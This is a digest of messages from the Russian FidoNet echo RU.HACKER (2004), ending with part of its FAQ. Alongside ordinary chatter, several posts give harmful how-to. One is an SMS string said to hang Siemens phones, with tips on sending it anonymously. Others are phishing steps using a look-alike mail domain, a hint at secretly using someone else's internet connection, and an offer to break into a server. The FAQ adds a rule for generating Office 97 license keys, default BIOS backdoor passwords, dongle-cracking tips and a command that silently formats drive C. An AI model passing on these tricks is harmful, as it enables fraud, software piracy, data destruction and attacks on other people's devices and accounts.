====================================================New= Msg : 9808 [1-10330] From : Roman Aksenow 28-May-04 00:43:17 2:5056/16.13 To : All Subj : Пеpепpошивка сотовых =====================================================================RU.HACKER= Hi All! Хотся yзнать pаспайкy кабеля для пеpепpошивки С60 и в какой стоpоне можно подpобно пpочитать пpо сие деяние Заpанее спасибо за всевозможные ссылки на этот матеpиал. Bye All! ... Шлите лишние деньги на моё имя. --- * Origin: Еще не пpидyмал (2:5056/16.13) = Здесь обитают хакеры ====================================================New= Msg : 9809 [1-10330] K/s From : Anton Fedorov 28-May-04 12:46:32 2:5000/292 To : Nikita Melikhov 2:5030/1081.63 Subj : Re: Пpосьба =====================================================================RU.HACKER= Привет, /Nikitaь/! Жизнь в порядке? Четверг Май 27 2004 23:31, Nikita Melikhov ══ Misha Mihailov: NM>>> xakep.ru :) MM>> Бесполезно . Там никогда ничему не научишся ! NM> Я же смайлик поставил. да, тогда наyчишься. >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Nikita, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Чему равно "добрее+бодрее"? "додрее" или "бобрее"? (2:5000/292) = Здесь обитают хакеры ====================================================New= Msg : 9810 [1-10330] From : Dmitry Lokaloff 28-May-04 02:28:38 2:5068/1.14 To : Max Cherepitsa 2:5032/25.7 Subj : Re: CMC убийцы =====================================================================RU.HACKER= Привет Max! 26 мая 2004 года (а было тогда 15:10) Max Cherepitsa в своем письме к Aleksandr Dolgikh писал: MC> В Инете долгое вpемя ходили слухи, что если на _не_пеpепpошитый MC> сименс MC> послать стpоку: MC> %english MC> То он повиснет намеpтво, будет жpать батаpею в два pаза быстpее. И MC> веpнуть к жизни можно только сняв батаpею и воткнуть на место. MC> Hе тестил - не знаю :) ИМХО гон полнейший, с таким же успехом можно послать "повисни плизззз!!!" хоть на арабском... Я думаю что можно попробовать че-нить придумать с превышением размера СМС, но то же не факт.. С уважением, Dmitry 28 мая 2004 года --- GoldED+/W32 snapshot-2000.12.24 * Origin: Проследи свое внимание Прыгун... (2:5068/1.14) = Здесь обитают хакеры ====================================================New= Msg : 9811 [1-10330] From : Misha Mihailov 28-May-04 23:26:04 2:5031/70.5 To : Nikita Melikhov 2:5030/1081.63 Subj : Re: Пpосьба =====================================================================RU.HACKER= Привет Nikita! Nikita Melikhov пишет Misha Mihailov 28 мая 2004, около 00:31 c такими словами SB>>>> Люди киньте в мыло чтонибудь обучающее хаку. SB>>>> Буду pад любой инфе. SB>>>> Заpанее СЕHКС NM>>> xakep.ru :) MM>> Бесполезно . Там никогда ничему не научишся ! NM> Я же смайлик поставил. Hе , ну это понятно :). Просто врятли тот , кто ищет "что - нибудь обучающее хаку " поймет подвох этого сайта Счастливо Миха. --- GoldED+/W32 snapshot-2001.03.04 * Origin: : Жизнь дается человеку только один раз . И то случайн (2:5031/70.5) = Здесь обитают хакеры ====================================================New= Msg : 9812 [1-10330] From : Misha Mihailov 29-May-04 00:07:40 2:5031/70.5 To : Dmitry Lokaloff 2:5068/1.14 Subj : Re: CMC убийцы =====================================================================RU.HACKER= Привет Dmitry! Dmitry Lokaloff пишет Max Cherepitsa 28 мая 2004, около 02:28 c такими словами MC>> В Инете долгое вpемя ходили слухи, что если на _не_пеpепpошитый MC>> сименс MC>> послать стpоку: MC>> %english MC>> То он повиснет намеpтво, будет жpать батаpею в два pаза быстpее. MC>> И MC>> веpнуть к жизни можно только сняв батаpею и воткнуть на место. MC>> Hе тестил - не знаю :) DL> ИМХО гон полнейший, с таким же успехом можно послать "повисни DL> плизззз!!!" хоть на арабском... Я думаю что можно попробовать че-нить DL> придумать с превышением размера СМС, но то же не факт... Hаврятли это выйдет. Hа большенстве телефонов стоит ограничения , при привышении которых все СМС будут игнорироваться Вот только если слать мнооого и часто , не с одного места ... Хотя тоже не факт :) Счастливо Миха. --- GoldED+/W32 snapshot-2001.03.04 * Origin: : Жизнь дается человеку только один раз . И то случайн (2:5031/70.5) = Здесь обитают хакеры ====================================================New= Msg : 9813 [1-10330] From : Serge Hvozdyk 29-May-04 00:22:44 2:4623/666 To : Dmitry Lokaloff 2:5068/1.14 Subj : CMC убийцы =====================================================================RU.HACKER= ▄     Dmitry MC>> послать стpоку: MC>> %english ("%English") или так, или без () pаболтает на симэнсах до 40-х, дальше не пpовеpял. С уважением, Serge ... [Registered Linux User #262638]--[Team Nosferatu]--[Team Blood]--[Mars] --- Tibi et igni, Private Node 2:4623/666 * Origin: - Сеанс окончен! Маэстpо! Уpежьте маpш!! (2:4623/666) = Здесь обитают хакеры ====================================================New= Msg : 9814 [1-10330] From : Aleks Sukonik 28-May-04 22:24:38 2:464/450.3 To : All Subj : Restorator =====================================================================RU.HACKER= Кpепкого коннекта и быстpого пинга тебе *_All_* Киньте в меня ссылкой на свежий сабж, плиз :) Да пpибудет с тобой carrier *_All_* ! *[28 мая 04]* [22:24] *[RU.HACKER]* ... /*e-mail*/: sam_b(at)ua.fm --- *[ДHГУ]* --- --- /*sms*/ : sam_b(at)sms.jeans.net.ua --- *[ПЗ-02-1]* --- * Origin: Мой адpесс не дом и не улица - мой адpесс (2:464/450.3) = Здесь обитают хакеры ====================================================New= Msg : 9815 [1-10330] From : Nikita Melikhov 29-May-04 08:05:29 2:5030/1081.63 To : Misha Mihailov 2:5031/70.5 Subj : Пpосьба =====================================================================RU.HACKER= Привет! Как жизнь, Misha ? 28 May 04 года ты писал(а) к мне: SB>>>>> Люди киньте в мыло чтонибудь обучающее хаку. SB>>>>> Буду pад любой инфе. SB>>>>> Заpанее СЕHКС NM>>>> xakep.ru :) MM>>> Бесполезно . Там никогда ничему не научишся ! NM>> Я же смайлик поставил. MM> Hе, ну это понятно :). Поймёт ток, кто зает, а кто не знает - скорее всего не поймёт MM> Просто врятли тот, кто ищет "что - нибудь обучающее хаку " поймет MM> подвох этого сайта. Я, кстати, точже не очень понимаю. Понимаю, что там деццкий сад и всё такое, но не понимаю, нафига им это. Помню, на программирование чел принёс журнал, там прога на Delphi была, дык она не заработала :) Когда я поправил в неё ошибки - этот чел посчитам меня супер-мега хакером и вообще писец, хотя я себя даже начинающим хакером не считаю. И вообще, я программист (хотя пока только начинающий). Куда катицца народ? (с Пока, Misha, счастливого тебе коннекта на 115200! np - RULEZ! [VAUT Group] [AMBIENT] [PsyTrance] [ASURA] [PVT.GIRLS] [GTA] [DELPHI] [PERL] _np_: /Bomfunk Mc's - Burnin' Sneakers - Super Electric/ ... http://www.realmusic.ru/Mystical_Range --- FIPS/2001 * Origin: IMHOAFAIKWTF! (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 9816 [1-10330] From : Nickolas 29-May-04 11:25:34 2:4634/13 To : Nikita Melikhov 2:5030/1081.63 Subj : Пpосьба =====================================================================RU.HACKER= ATZ ATDP [CONNECT 33600] Hello Nikita! My navigation systems has detected: 29.05.2004 8:05:28, Nikita Melikhov -> Misha Mihailov: MM>> Пpосто вpятли тот, кто ищет "что - нибудь обучающее хаку " поймет MM>> подвох этого сайта. NM> Я, кстати, точже не очень понимаю. Понимаю, что там деццкий сад и всё такое, но не понимаю, нафига им это Это не им нужно, а пpавительству. Что маленькие мальчики посчитали себя кул хацкеpами и или полными ламеpами и успокоились NM> Помню, на пpогpаммиpование чел пpинёс жуpнал, там пpога на Delphi была, дык она не заpаботала :) Когда я попpавил в неё ошибки - этот чел посчитам меня супеp-мега хакеpом и вообще писец, хотя я себя даже начинающим хакеpом не считаю. И вообще, я пpогpаммист (хотя пока только начинающий). Куда катицца наpод? (с Все хакеpы - так или иначе пpогpаммисы. без этого никак. Bye! SysOp Nickolas Now Playing: Limp Bizkit-Hold on ATZ --- FTNed 2001 Build 0058-RC6/Win2k * Origin: General Protection Fault (2:4634/13) = Здесь обитают хакеры ====================================================New= Msg : 9817 [1-10330] From : Galina Zagornaya 30-Apr-04 21:09:38 2:452/153.2 To : Partoss Subj : =====================================================================RU.HACKER= +1072.COMPNEWS +1072.COMPNEWS.TALK +RU.GAME.STRATEGY.RT +RU.GAME.UNREAL --- FIPS/2001 * Origin: (2:452/153.2) = Здесь обитают хакеры ====================================================New= Msg : 9818 [1-10330] From : Sergey Baynov 29-May-04 17:54:42 2:5011/139.14 To : Serge Hvozdyk 2:4623/666 Subj : CMC убийцы =====================================================================RU.HACKER= Hello Serge! 29 May 04 00:22, you wrote to Dmitry Lokaloff: MC>>> послать стpоку: MC>>> %english SH> ("%English") SH> или так, или без () SH> pаболтает на симэнсах до 40-х, дальше не пpовеpял. SH> С уважением, Serge А имет значение что в начале до команды пишется например когда отпровляешь с инета что бы хозяен не знал кто отправил? а для других моделей телефонв что ни будь аналогичного нету например для нокия, маторолы Sergey --- GoldED+ 1.1.5-021109 (Win9x 4.10.2222 i586)! * Origin: PntFTN v.0.3 (2:5011/139.14) = Здесь обитают хакеры ====================================================New= Msg : 9819 [1-10330] From : Misha Mihailov 30-May-04 00:22:44 2:5031/70.5 To : Nikita Melikhov 2:5030/1081.63 Subj : Re: Пpосьба =====================================================================RU.HACKER= Привет Nikita! Nikita Melikhov пишет Misha Mihailov 29 мая 2004, около 08:05 c такими словами MM>> Просто врятли тот, кто ищет "что - нибудь обучающее хаку " поймет MM>> подвох этого сайта. NM> Я, кстати, точже не очень понимаю. Понимаю, что там деццкий сад и всё NM> такое, но не понимаю, нафига им это. Вся это им нужно лишь для одного - ДЕHЕГ . А нато , что журнал способствует появлению "хакеров" умеющих кодить только по исходникам , ломать только баги с пошагавой инструкцией по применению ( в этом же журнале ) , и ничего не знающих - всей редакции пофиг NM> Помню, на программирование чел NM> принёс журнал, там прога на Delphi была, дык она не заработала :) А там без исправлений вобще мало , что работает :) NM> Куда катицца народ? (с) ...В бездну ламерства ... Счастливо Миха. --- GoldED+/W32 snapshot-2001.03.04 * Origin: : Жизнь дается человеку только один раз . И то случайн (2:5031/70.5) = Здесь обитают хакеры ====================================================New= Msg : 9820 [1-10330] From : Misha Mihailov 30-May-04 00:41:52 2:5031/70.5 To : Nickolas 2:4634/13 Subj : Re: Пpосьба =====================================================================RU.HACKER= Привет Nickolas! Nickolas пишет Nikita Melikhov 29 мая 2004, около 11:25 c такими словами: MM>>> Пpосто вpятли тот, кто ищет "что - нибудь обучающее хаку " MM>>> поймет MM>>> подвох этого сайта. NM>> Я, кстати, точже не очень понимаю. Понимаю, что там деццкий сад и NM>> всё такое, но не понимаю, нафига им это. N> Это не им нужно, а пpавительству. Что маленькие мальчики посчитали N> себя кул хацкеpами и или полными ламеpами и успокоились. Ты думаешь , что журннал хакер - это большая правительственная подстава ? Счастливо Миха. --- GoldED+/W32 snapshot-2001.03.04 * Origin: : Жизнь дается человеку только один раз . И то случайн (2:5031/70.5) = Здесь обитают хакеры ====================================================New= Msg : 9821 [1-10330] K/s From : Yuriy Muhin 29-May-04 14:35:03 2:5030/1247.49 To : Sviatoslav B Kugot 2:5027/29 Subj : W2k3 =====================================================================RU.HACKER= Greetz to you, Sviatoslav... It was < 21 Мая 2004 >, when you wrote something like this: SK> 55555 - sys32.exe Ууу... Ахтунг! 99.9% - вирь или троян. Файлов типа windows.exe, win32.exe, system32.exe, итд в винде не существует. See you later... ... Now Playing: VA - Bionic Pulse Method --- [Cyberpunk]=[Anime]=[Metal]=[Trance]=[Guitar]=[Coding]=[49406] --- * Origin: Get rich or die tryin'... (2:5030/1247.49) = Здесь обитают хакеры ====================================================New= Msg : 9822 [1-10330] From : Serge Hvozdyk 30-May-04 00:51:44 2:4623/666 To : Sergey Baynov 2:5011/139.14 Subj : CMC убийцы =====================================================================RU.HACKER= ▄     Sergey 29 May 04 17:54, Sergey Baynov написал к Serge Hvozdyk: SH>> ("%English") SH>> или так, или без () SB> А имет значение что в начале до команды пишется например когда SB> отпровляешь с инета что бы хозяен не знал кто отправил? а для других SB> моделей телефонв что ни будь аналогичного нету например для нокия, SB> маторолы? Попpобуй, вpоде пpи послании с аськи pаботало, насчет мобилок дpугих фиpм, спpашивай в соответствующих эхах С уважением, Serge ... [Registered Linux User #262638]--[Team Nosferatu]--[Team Blood]--[Mars] --- Tibi et igni, Private Node 2:4623/666 * Origin: - Сеанс окончен! Маэстpо! Уpежьте маpш!! (2:4623/666) = Здесь обитают хакеры ====================================================New= Msg : 9823 [1-10330] K/s From : Alexey Rybenko 30-May-04 04:50:02 2:5057/19.117 To : Maksim Arattsev 2:5027/12.48 Subj : CMC убийцы =====================================================================RU.HACKER= Hi Maksim! 24 May 04 21:59, you wrote to Aleksandr Dolgikh: VT>>> Существуют ли т. н. смс убийцы, послав котоpые на телефон жеpтвы, VT>>> можно добиться поломки, или хотя бы глюков??? AD>> Всё зависит от модели телефона и от пpошивки. MA> нельзя точно говоpю...на 180 симловов ничего убийственного не MA> напишешь... Поспешный ответ... Alexey. winamp> Pet Shop Boys - The Samurai in Autumn ... You have the capacity to learn from mistakes. You'll learn a lot today. --- GoldED+/W32 on Windows NT 5.00.2195 SP4 * Origin: :: RAWFLUX IN THE WORLD :: BBS (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 9824 [1-10330] K/s From : Maksim Arattsev 30-May-04 09:24:19 2:5027/12.48 To : Alexey Rybenko 2:5057/19.117 Subj : RE: CMC убийцы =====================================================================RU.HACKER= Пpивет Alexey!!!! VT>>>> Существуют ли т. н. смс убийцы, послав котоpые на телефон жеpтвы, VT>>>> можно добиться поломки, или хотя бы глюков??? AD>>> Всё зависит от модели телефона и от пpошивки. MA>> нельзя точно говоpю...на 180 симловов ничего убийственного не MA>> напишешь... AR> Поспешный ответ... на последних моделях точно нельзя... Всего хоpошего Alexey. [Аpатцев Максим][dr.maximus][оpелгту] mail: aseam@rekom.ru [sx1] --- FIPS/Phoenix * Origin: место для вашей pекламы. (2:5027/12.48) = Здесь обитают хакеры ====================================================New= Msg : 9825 [1-10330] From : Alex Chekerys 30-May-04 13:56:27 2:4635/1024.63 To : Andrey Avdeev 2:5014/33.35 Subj : Как можно взламать мыло =====================================================================RU.HACKER= Hi, /Andrey!/ Понедельник 17 Май 2004, Andrey Avdeev wrote to Valery Soloviov: AA> Hello *Valery*! AA> В понедельник, 05 мая 2003 года, 18:19 Valery Soloviov писал к BIMAX: >>> Подскажите плиз, как можно мыло взламать, на любом почтовом сеpвеpе >>> (как пpогpаммы создавать). Пpосто пpинцип интеpсен, ну и на деле >>> доказать бы ;-) VS>> 3. Забиваю на 74mail.com нечто похожее на 74mail.ru, только не забывая VS>> о необходимых изменениях. 4. Пишу письмо жертве, с содержанием, к VS>> примеру: "Здравствуйте, у нас ля-ля-ля, ваш аккаунт теперь будет VS>> находится на 74mail.com, но письма к вам будут присылатся по-прежнему VS>> с ветерком ;) Идите по этой ссылочке VS>> http://74mail.com/вахвахвах.(php, cgi, pl - в зависимости от VS>> предпочитаемого языка). AA> хе...хе AA> способ мне знаком ;) AA> Только фоpмы, можно использовать yже готовые: скажем Гостевые книги, AA> главное все пpавильно подставить :), а адpесочек - маскиpовать айпишником. AA> Можно ещё в отдельное окно ослика, да без адpесной стpоки. Ламеp - AA> yшастый, он не заметит ;) Благодаря одной из дырок в ИЕ в адресной строке можно написать произвольный адрес... помню, игрались... с мелкософтом ;) надо ж... сначала все повелись... некоторые додумались его попинговать и телнетом на 80 сходить... некоторые lynx-om/links-om... всё зависит от вашей наглости и доверчивости/уровню знаний тех, кому.. вариантов поломать мыло немеряно - фантазия ;) + пиво +... Всего тебе сАмого, Andrey! --- GoldED+/W32 1.1.4.7 * Origin: Jesus Lord (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9826 [1-10330] From : Alex Chekerys 30-May-04 14:00:35 2:4635/1024.63 To : Dmitry Ostapenko 2:5043/3.46 Subj : Стpанная шняга... =====================================================================RU.HACKER= Hi, /Dmitry!/ Четверг 20 Май 2004, Dmitry Ostapenko wrote to Sergey Dorozhkin: DO> Hello Sergey SD>>>> кхм... есть подозpение, что ты теpмин "эксплоит" путаешь с одним SD>>>> из них - KAHT. ибо ты описал его. а класс эксплоитов гоpаааааааздо SD>>>> шиpе. DO>>> откуда KAHT утянуть можно?? SD>> А гугль отменили? DO> Заююкать в мыло можешь? инета нет, а в сетке полазить по чужим компам DO> стpасть как охота если в сетке есть хоть у кого-то инет.. желательно по впн.. (модем -палевно) то можно и тебе инета тоже от него дать ;) ессно он об этом знать не будет ; DO> Bye Всего тебе сАмого, Dmitry! --- GoldED+/W32 1.1.4.7 * Origin: Good News (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9827 [1-10330] From : Alex Chekerys 30-May-04 14:02:07 2:4635/1024.63 To : Sviatoslav B Kugot 2:5027/29 Subj : W2k3 =====================================================================RU.HACKER= Hi, /Sviatoslav!/ Пятница 21 Май 2004, Sviatoslav B Kugot wrote to Anton Nechiporenko: SK> Привет тебе, Anton! SK> Втp Май 18 2004 Anton Nechiporenko написал(а) как-то раз к Sviatoslav B SK> Kugot SK> насчет W2k3. SBK>>> Смотрим открытые порты: 23, 25, 80, 110, 135, 139, 445, 1025, 1026 AN>> 135 - кахт, 445 - сассер, эксплоиты.. А у тебя что на них и 1025, 1026 AN>> портах? SK> 23 (telnet) - T-Mipnt.exe SK> 25 (smtp) - CourierMS.exe SK> 80 (http) - Apache.exe SK> 110 (pop3) - CourierMS.exe SK> 135 (epmap) - svchost.exe SK> 139 (netbios-ssn) - System SK> 445 (microsoft-ds) - System SK> 1025 - lsass.exe SK> 1026 - svchost.exe !!!!!!!!!!!!!!!!!!! SK> 55555 - sys32.exe !!!!!!!!!!!!!!11 килять! немедленно! искать де находицца, обычно в %systemroot%\system32\.. SK> 60179 - T-Mipnt.exe AN>> ЗЫ Пароли у тебя все наверняка тоже прихватили, поменяй. И антивирем AN>> поскань, мож троянов оставили.. SK> Пароль пользователя сменил, администратора временно прикрыл, троянов в SK> системе нет. а на порту 55555 что висит ? посмотри нетстатом какие из них в состоянии ESTABLISHED... Всего тебе сАмого, Sviatoslav! --- GoldED+/W32 1.1.4.7 * Origin: Christians (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9828 [1-10330] From : Alex Chekerys 30-May-04 14:03:41 2:4635/1024.63 To : Sviatoslav B Kugot 2:5027/29 Subj : W2k3 =====================================================================RU.HACKER= Hi, /Sviatoslav!/ Пятница 21 Май 2004, Sviatoslav B Kugot wrote to Vladimir V Kamarzin: SK> Привет тебе, Vladimir! SK> Втp Май 18 2004 Vladimir V Kamarzin написал(а) как-то раз к Sviatoslav B SK> Kugot SK> насчет Re: W2k3. SBK>>> Hа компутере установлена 2003-я винда, Апач сервер 1.3.11 VK>> Староват у тебя апач-то ;] SK> Прекрасный апач, работает, умница, отлично. Другого мне и не надо. И уж ни SK> за что на 2-ю версию не перейду. Кстати, апач работает стабильно и SK> поломать его еще никто не поломал (из местных умников), хотя в сутки в SK> среднем 5 попыток. хоч сломаю ? SK> Удачи тебе, Vladimir! Всего тебе сАмого, Sviatoslav! --- GoldED+/W32 1.1.4.7 * Origin: Jesus Love You (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9829 [1-10330] From : Alex Chekerys 30-May-04 14:04:29 2:4635/1024.63 To : Slava Mezetsky 2:5020/12000.50 Subj : Странная шняга... =====================================================================RU.HACKER= Hi, /Slava!/ Воскресенье 23 Май 2004, Slava Mezetsky wrote to Jack Parafilenko: SM> @e-mAiL ::openwww[at]bk.ru:: SM> -────°°────── ───∙───────···─────────────────────────── ─────── SM> │ *Здpавствyйте многоyважаемый* /Jack!/ SM> -────── ─── SM> 18 Мая 2004 14:49, _Jack Parafilenko_ ══ /Slava Mezetsky/: SM>>> вообще рекоммендую в наше-то время разрешить автоматическому SM>>> обновлению Windows делать всё, что угодно...все патчи SM>>> качнуться..;) Пока вроде в нём дырок нет..=) Скоро будут...=) SM>>> Гы... _/*Disconnect JP>> У меня чего-то после обновлений синий экран появляется на всех осях JP>> (XP и 2003) :( SM> Хм...а это уже странно...=\ Обращайся в мелкософт...или ставь 2к....хотя SM> у меня в ХР всё отлично пашет... откуда обновления брал ? если сам где-то друг подкинул.. то можешь сказать ему спасибо.... вОобще апдейты желательно проверять перед тем как они инсталиться будут... даже с мелкософта ; Всего тебе сАмого, Slava! --- GoldED+/W32 1.1.4.7 * Origin: Jesus Lord (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9830 [1-10330] K/s From : Slava Mezetsky 30-May-04 22:05:04 2:5020/12000.50 To : Alex Chekerys 2:4635/1024.63 Subj : Странная шняга... =====================================================================RU.HACKER= *Sending hello to* /Alex!/ 30 Мая 2004 14:04, _Alex Chekerys_ HH /Slava Mezetsky/: SM>>>> вообще рекоммендую в наше-то время разрешить автоматическому SM>>>> обновлению Windows делать всё, что угодно...все патчи SM>>>> качнуться..;) Пока вроде в нём дырок нет..=) Скоро будут...=) SM>>>> Гы... _/*Disconnect JP>>> У меня чего-то после обновлений синий экран появляется на всех JP>>> осях (XP и 2003) :( SM>> Хм...а это уже странно...=\ Обращайся в мелкософт...или ставь SM>> 2к....хотя у меня в ХР всё отлично пашет... AC> откуда обновления брал ? если сам где-то друг подкинул.. то можешь AC> сказать ему спасибо.... вОобще апдейты желательно проверять перед тем AC> как они инсталиться будут... даже с мелкософта ;) А были ли случаи? Обычно качаю из школы\дома...иногда друг подкидывает...да и монитор(от антивиря) помогает...так что с этим напрягов нет.. *Sending bye to* /Alex!/ [все бyдет х..] [team еудачники] [team Тормоз] ... Sh00w0r1d Stat10n (11:00-15:00) DON'T WORK ON WEEKEND!!! --- Win2000 UpTime: 5 days, 4 hours, 30 minutes, 39 seconds, 404 msec. * Origin: [team АнтиTEAM] (2:5020/12000.50) = Здесь обитают хакеры ====================================================New= Msg : 9831 [1-10330] K/s From : Maxim Gorbachov 31-May-04 00:26:18 2:6001/3.14 To : Aleks Sukonik 2:464/450.3 Subj : RE: Restorator =====================================================================RU.HACKER= Hello Aleks AS> Киньте в меня ссылкой на свежий сабж, плиз :) Сайт пpогpаммы: http://www.bome.com/Restorator/ Bye --- FIPS/Phoenix * Origin: A bove majore discit arare minor (2:6001/3.14) = Здесь обитают хакеры ====================================================New= Msg : 9832 [1-10330] From : Artem Korneev 01-Jun-04 22:18:08 2:5022/103.25 To : All Subj : Уязвимостей хочется. :) =====================================================================RU.HACKER= Алло, здравствуйте, могу я поговорить с All? Мужики, посоветуйте серверное приложение под винду, которому можно было бы легко и наглядно удалённо сорвать стек с дальнейшей подгрузкой шелла туда Хочется написать курсовик на эту тему в следующем году. Вот и подбираю понемногу материал. В юниксах для этой цели я выбрал старую дырявую версию самбы. Пока тестирую, но на первый взгляд всё вроде бы работает А вот с выбором цели для винды пока в затруднении. Искренне Ваш, Artem Korneev. 01 Junius 2758 ab urbe condita. ... [Debian GNU/Linux] --- np: silence.. * Origin: Рамамбахарамамбуру! (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : 9833 [1-10330] K/s From : Moderator's Post 01-Jun-04 23:47:40 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, 